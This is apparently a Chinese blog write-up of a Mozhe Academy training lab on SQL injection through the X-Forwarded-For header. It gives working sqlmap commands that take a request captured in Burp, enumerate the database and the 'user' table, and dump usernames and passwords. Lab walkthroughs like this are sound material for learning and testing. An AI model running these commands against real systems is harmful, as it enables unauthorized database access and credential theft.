墨者學(xué)院 - X-Forwarded-For注入漏洞實戰(zhàn)

隨便輸入用戶名密碼登錄,提示有ip信息,根據(jù)題目的意思是信息是根據(jù)x-forwarded-for的紙變得,所以本題存在x-forwarded-for注入
1.首先打開burp抓包,添加x-forwarded-for:*,將raw的信息存為txt文件,如下圖所示,速度比較慢,請耐心等待


image.png

2.爆出當(dāng)前的數(shù)據(jù)庫

sqlmap -r 1.txt --current-db --batch    

3.爆表名

sqlmap -r 1.txt -D webcalendar -T user --columns --batch

4.爆表中的字段

sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch

5.爆出兩組賬戶密碼,進(jìn)行嘗試組合,即可登錄成功

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

友情鏈接更多精彩內(nèi)容